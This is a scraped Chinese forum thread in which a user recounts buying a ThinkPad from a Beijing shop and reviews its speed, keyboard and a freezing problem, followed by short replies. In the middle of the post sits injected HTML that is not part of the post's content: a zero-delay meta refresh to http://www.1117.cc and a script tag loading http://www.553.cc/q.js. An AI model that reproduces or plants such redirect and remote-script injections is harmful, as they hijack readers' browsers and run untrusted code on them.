开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 我的购机过程及使用体会!!

用小黑差不多一周了,现在简单描述一下我的购机过程和使用感受。
我的第一台笔记本是DELLD600,在今年3月份被偷了,这个我在前面的帖子也提到过,有兴趣的TX可以翻翻看,呵呵!我的漫长的看机选机过程在此就不详细说了,要说起来三天三夜也说不完啊!!哈哈,有点夸张了!
就从我在翔意出手那天说起吧!1224日早晨起床比较晚,快9点了,吃完饭,看了一会NBA直播,老婆想带儿子去军博,让我把他们送去,我想正好顺道去翔意吧(其实一点也不顺,哈哈)。出门后,先去银行取了13000大洋,然后直奔军博,给老婆儿子买了门票后,在车里给翔意打了个电话,问了下D63是否有货,得到肯定的答复后,从长安街到建国门上二环,到了朝阳门就拐上了朝阳门外大街,结果到了蓝岛,发现不对头,又给翔意致电,得知是朝阳门北边一点,这回没走错,到了天辰门口,门卫问我去哪?我说1204,门卫又问我是里面的人吗?我说是,放行,停车!楼门口站着圣诞老人,得到“圣诞快乐!”的问候,小爽一下。
做电梯上了12楼,先找卫生间,都憋一个多小时了,放水后舒服多了!楼里比较冷清,听到一个屋里传出说话声,跟我电话里听过的声音一模一样,就这了,没错,1204就在电梯间右侧。门没关,没敲门,直接进去了,里面有四张桌子,三张都有人了,还有一张那就是我的了。一位大眼睛的帅哥,也就是跟我通电话那位,问我要什么机器,我说D63,马上进套间给我拿出一个箱子,打开放到桌子上,让我先看看,简单看了一下外观,盼望了很久的小黑就摆在我的面前,我要拥有你——小黑,如果要给这个拥有加上一个期限,我希望这个期限是——10000年!!哈哈
鉴于对翔意的信任和了解,查看了一下屏幕是否有坏点和电池充电次数(1次)后,就让帅哥给加了条512M的金士顿,然后开始做系统。期间见到了传说中的漂亮MM,果然名不虚传,话不多,要是能多点笑容就更好了。做系统花了20来分钟,选了个C套餐,再买一个小黑鼠,另一个称做小慧的MM给我计算了一下价格,报14280,咦,怎么跟我计算的价格差很多啊?原来MMC套餐的减300给我变成加300了,难道我看起来像加减法很差的人吗?开个玩笑!呵呵,重新计算,13680元,付钱,拿票,漂亮MM帮我把机器装到箱子里,用胶带封好,道别走人,从进门到出门不超过一小时。
下面说一说这几天的使用感受吧!
速度那是没得说了,一个字——真快!键盘手感非常好,DELL的跟这没法比!指纹也很灵敏,很好用;散热超级棒,开一晚上,掌托部分摸上去,只有一点温热;高分屏适应后,感觉非常好,可视面积增加了很多啊!不用老是拖动滚动条了。对编程尤其好,但是浏览网页感觉字体有点小,不过,这个跟网站的设置有关系。这些都是优点,下面说几点遗憾。
一个是屏幕扣上后,不太紧,缝隙比较大;二是音箱很一般,不过,这也可以理解,商务机嘛!还有一个使用中的问题,这两天出现在浏览网页的时候,机器突然就动不了了,按任何键都没反应,除了按电源关机没别的办法,昨天和今天各出现一次,我想这应该是软件问题,就是没搞清楚具体原因,我的机器上装了WINDOWS XPWINDOWS 2003 SERVER两个系统,好象都是在2003上出现的死机现象。在2003上我有一个驱动一直没有装上,不知是否跟这有关?
下面SHOW一下我的小黑,让大家也饱饱眼福!!

+500---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

键盘

键盘

LOGO

LOGO

指纹识别

指纹识别

蓝牙无线开关

蓝牙无线开关

IBM LOGO

IBM LOGO

我的桌面

我的桌面

评分

tszmsid + 500

贺一下吧

好东西就是不一般
品质就是好
一个字 加分!```
谢谢tszmsid!
有机会,我还会去翔意的!!
嘻嘻,太棒了,如果我换小黑的话,

嘻嘻
应该鼓励,站一个好子
呵呵,D63,me too,用着很爽
btw:03上的驱动我倒是都装上了,不知道你的是哪一个
原帖由 tszmsid 于 2006-12-30 14:09 发表
一个字 加分!```

“一个字 加分”

不会吧,你才取了1.3啊,怎么付了1.36呢?

呵呵,难道身上日常就装了大量现金?

回复 #10 microzt 的帖子

蓝牙驱动我也装上了,是XP下的驱动!2003没有对应的驱动程序

回复 #12 prpall 的帖子

平时身上装个千八块也不能算大量现金吧?
lz米人啊
用好的东西,可能灵感也多一点
羡慕,眼馋
原帖由 tszmsid 于 2006-12-30 14:09 发表
一个字 加分!```

两个字呢
好想有自己的D63呀
太靓的机子了~~买不起呀~!
好本子用起来就是爽!